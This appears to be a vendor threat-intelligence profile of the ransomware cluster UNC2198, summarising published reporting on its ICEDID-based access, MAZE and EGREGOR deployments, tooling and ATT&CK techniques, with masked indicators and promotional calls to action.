10 malware familiesExploits CVEs in the wild

UNC2198

Also known asunc2198

UNC2198 is a financially motivated intrusion cluster tracked by Mandiant that used ICEDID infections as an initial foothold to monetize intrusions through ransomware deployment. Mandiant described it as the most prominent ICEDID-enabled threat cluster in the reporting and attributed nine separate intrusions in 2020 to the group. UNC2198 targeted organizations in North America across a breadth of industries. In at least five cases, it acquired initial access from UNC2420’s phishing distribution chain involving MOUSEISLAND, PHOTOLOADER, and ICEDID. Mandiant observed UNC2198 deploy MAZE ransomware in July 2020 and later shift to EGREGOR in October and November 2020, with the UNC2198-UNC2414 merge assessed as significant because it revealed UNC2198 had access to EGREGOR ransomware. Mandiant merged related clusters UNC2374 and UNC2414 into UNC2198 based on shared infrastructure and artifacts, including shared Cobalt Strike certificate subject details on TCP port 25055, shared WINDARC and BEACON file paths, shared code-signing certificate usage, shared ICEDID-based initial access, and shared RCLONE usage from C:\PerfLogs\rclone.exe. Observed tradecraft included InnoSetup droppers to install the WINDARC backdoor; BITS jobs and remote PowerShell downloads to retrieve tools such as SYSTEMBC; use of Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE; discovery activity including BloodHound and commands such as whoami, net group, nltest, and arp; lateral movement via WinRM and RDP; remote execution of BEACON service binaries; and SMB BEACON launched via PowerShell in at least one case. In one intrusion, UNC2198 used the SOURBITS utility to exploit CVE-2020-0787 for privilege escalation. Prior to ransomware deployment, UNC2198 exfiltrated hundreds of gigabytes of victim data using RCLONE, consistently observed at C:\PerfLogs\rclone.exe. Mandiant measured time-to-ransom from ICEDID activity to ransomware deployment at 5.5 days for MAZE, deployed via PsExec, and 1.5 days for EGREGOR, deployed via forced GPO updates. Known aliases and merged sub-groups directly mentioned in the content are UNC2374 and UNC2414.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

MITRE ATT&CK

Tradecraft

19 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

10 of 15 tactics32 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0001

Initial Access

2 techniques

T1133

External Remote Services

T1566

Phishing

T1566.001

Spearphishing Attachment

TA0002

Execution

4 techniques

T1047

Windows Management Instrumentation

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1059

Command and Scripting Interpreter

T1059.001

PowerShell

T1059.003

Windows Command Shell

T1569

System Services

T1569.002

Service Execution

TA0003

Persistence

3 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1112

Modify Registry

T1133

External Remote Services

TA0004

Privilege Escalation

1 technique

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

TA0005

Stealth

1 technique

T1027

Obfuscated Files or Information

TA0112

Defense Impairment

1 technique

T1112

Modify Registry

TA0007

Discovery

4 techniques

T1016

System Network Configuration Discovery

T1069

Permission Groups Discovery

T1087

Account Discovery

T1482

Domain Trust Discovery

TA0008

Lateral Movement

1 technique

T1021

Remote Services

T1021.001

Remote Desktop Protocol

T1021.002

SMB/Windows Admin Shares

TA0011

Command and Control

3 techniques

T1071

Application Layer Protocol

T1071.001

Web Protocols

T1090

Proxy

T1090.003

Multi-hop Proxy

T1105

Ingress Tool Transfer

TA0040

Impact

1 technique

T1486

Data Encrypted for Impact

ARSENAL

Associated malware families

10 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen

BEACONUNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE offensive security tools during this phase as well.1Mar 18, 2026

EgregorAt the close of 2020, we noticed a shift in a subset of these groups that have started to deploy EGREGOR ransomware in favor of MAZE ransomware following access acquired from ICEDID infections.1Mar 18, 2026

EmpireUNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE offensive security tools during this phase as well.1Mar 18, 2026

IcedIDSince its discovery in 2017 as a banking trojan, ICEDID evolved into a pernicious point of entry for financially motivated actors to conduct intrusion operations.1Mar 18, 2026

KoadicUNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE offensive security tools during this phase as well.1Mar 18, 2026

5 additional families tracked in Mallory.

WEAPONIZED

Associated vulnerabilities

1 CVE this actor has used in observed campaigns. 1 of them exploited in the wild.

CVE-2020-0787Windows BITS Elevation of Privilege via Improper Symlink HandlingIn the wildEvidence1

"During one intrusion, UNC2198 used the SOURBITS privilege escalation utility to execute files on a target system. SOURBITS is a packaged exploit utility for CVE-2020-0787... a vulnerability that was disclosed in 2020 for Windows Background Intelligent Transfer Service (BITS)."

IOCS

Observables

37 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

37 IOCsView more in app

hash.md5

19 total

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••+11

ip.v4

10 total

••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••+2

Domains

5 total

••••••.com•••••••.ru••••••••.com•••••••••.net••••••••••.com

uri

3 total

•••••••••••••••••••••••••••

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

1 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

1 SOURCESView more in app

fireeyeNews

Feb 25, 2021

So Unchill: Melting UNC2198 ICEDID to Ransomware Operations | FireEye Inc

Financially motivated intrusion cluster that leverages ICEDID-derived access to conduct hands-on-keyboard intrusions, deploys post-exploitation frameworks (notably Cobalt Strike BEACON), performs data theft (RCLONE), and ultimately deploys MAZE then later EGREGOR ransomware (affiliate model).

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping19

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal10

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs1

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables37

Domains, IPs, and hashes tied to this actor, refreshed continuously.